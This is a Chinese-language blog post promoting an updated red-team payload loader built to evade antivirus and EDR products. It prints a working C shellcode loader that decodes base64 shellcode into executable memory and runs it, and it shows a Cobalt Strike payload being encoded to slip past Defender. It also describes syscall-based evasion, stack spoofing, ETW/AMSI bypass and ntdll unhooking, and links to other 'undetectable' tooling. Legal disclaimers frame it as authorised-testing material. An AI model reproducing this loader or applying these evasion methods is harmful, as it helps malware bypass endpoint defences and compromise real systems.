文章总结： 本文介绍了一款更新版红队加载器LoaderV3，重点展示了其高级规避能力。工具集成SysWhispers4项目，通过随机间接系统调用、堆栈欺骗、ETW/AMSI绕过等技术实现EDR对抗，并利用codasm编码降低熵值以规避静态检测。文章分析了AV与EDR的检测逻辑差异，演示了如何通过优化API调用模式和内存执行策略来绕过防护，适用于合法授权的渗透测试与攻防演练，为安全人员提供了免杀技术的具体实现参考。 综合评分： 84 文章分类： 红队,免杀,安全工具,渗透测试

[更新]红队加载器LoaderV3

原创

陆安予 陆安予

白帽子安全笔记2.0

2026年3月11日 21:50 江苏

这是一个具有高级规避功能的有效载荷加载器。

一、背景

在之前的版本上，增加了两种加载方式。

UI界面

其中，使用了全球知名的AV/EDR绕过方案SysWhispers4项目，默认启用了全部规避功能，其中包括：

• • 回收之门
• • 随机间接系统调用
• • 堆栈欺骗
• • ETW绕过
• • ASMI绕过
• • ntdll解钩
• • 反调试

而codasm编码技术目的是减少熵，比传统加密方式降低了40%。

在这之前，我们得谈一谈相关知识。

二、加密和有效载荷

加密方式的选择虽然重要，传统的uuid、ipv4、base64、aes、rc4、xor、mac加密方法最近几年演变成了一些加密算法Mars、以及数学加密DET，还有降低熵值的codasm加密等。

先举个例子，这是一个使用base64加密执行calc有效载荷的代码，加密本身没有问题，对于AV来说，API的使用不影响最终结果：

//gcc Base64.c -s -lcrypt32

#include&nbsp;<windows.h>
#pragma&nbsp;comment (lib, "Crypt32.lib")

int main() {
&nbsp; &nbsp; const char b64Payload[] = "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA";
&nbsp; &nbsp; DWORD b64Len = sizeof(b64Payload);

&nbsp; &nbsp; LPVOID mem = VirtualAlloc(0, b64Len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
&nbsp; &nbsp; CryptStringToBinaryA(b64Payload, b64Len, CRYPT_STRING_BASE64, (BYTE*)mem, &b64Len, NULL, NULL);

&nbsp; &nbsp; ((void(*)())mem)();

&nbsp; &nbsp; return 0;
}

Defender

如果最终写入的内容没有恶意特征，则会放过，接下来我们使用完全无法检测的Cobalt Strike有效载荷：

python .\base64_Encoder.py .\payload_x64.bin >1.txt

显而易见，不检测了，API调用模式 + 最终载荷内容 = 检测结果。

如果说加载方式恶意是1分，恶意载荷是1分，如果最终大于等于2分，反之则通过。

三、AV/EDR规避

随着特征修补技术越来越强，传统AV越来越容易被绕过，因此开发了EDR等产品，它将深度检测程序行为。

| | AV | EDR | | — | — | — | | 逻辑 | 1+0<=2分，正常程序 | VirtualAlloc(RWX) → 可疑(+30分) 阶段2: CryptStringToBinaryA → 可疑(+20分) 阶段3: 写入内存 → 监控中 阶段4: 执行内存 → 恶意(+50分) 阶段5: 调用栈分析 → 异常(+25分) 结论: 总分125分 > 阈值，恶意程序 |

但今天我们的重点不是测试EDR，而是使用更高级的API调用模式，我们将使用强大的SysWhispers4实现这一点，它作为第四个版本，采用了更高级的规避技术，无疑是该领域顶级武器。

sw4加载的calc

直接从sys4.exe到ntdll.dll，中间没有任何的kernel32.dll，完美绕过了EDR在kernel32的钩子的监控，体现了sw4的强大之处。

堆栈欺骗

每次运行都从64个不同的ntdll地址中随机选择一个执行syscall。

随机间接调用

网络安全 #红队训练

四、使用场景

• • 适用于高级攻防，在合法授权的渗透测试中使用该技术。
• • 理解攻击原理，设计防御方案。

五、免责声明

本文涉及方案仅限合法授权的安全研究、渗透测试用途，使用者须确保符合《网络安全法》及相关法规。具体条款如下：

• • 仅可用于已获得书面授权的目标系统测试；
• • 遵守法律法规，不得用于侵犯他人隐私或数据窃取；

本人不承担因用户滥用本软件导致的任何后果。使用即视为同意并接受上述条款。

推荐阅读

• • [更新]红队加载器Loader
• • 攻防必备，DLL代理自动化生成
• • 攻防必备，DLL侧载（白加黑）自动化生成
• • 采用黑白名单匹配进行反沙箱
• • [版本更新]Cobalt Strike基础部署手册&高级白加黑&高级lnk快捷方式新技术
• • [0day]新挖掘到一套高级LNK快捷方式
• • 高级LNK快捷方式自动维持权限与进程注入
• • DLL侧载和DLL代理
• • [版本更新]高级lnk快捷方式武器化GUI
• • 大幅更新-高级lnk快捷方式新技术
• • 完全无法检测的cobaltstrike更新
• • [工具发布]幻影加载器GUI，高级堆栈欺骗
• • [工具发布]高级lnk快捷方式武器化GUI
• • LNK快捷方式的检测与突破
• • Cobaltstrike4.9.1平台高级匿名技术手册
• • Cobaltstrike4.9.1平台基础部署手册
• • 全网唯一，高级LNK快捷方式新技术发布
• • 顶级武器-完全无法检测的cobalt strike

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：白帽子安全笔记2.0 陆安予 陆安予《[更新]红队加载器LoaderV3》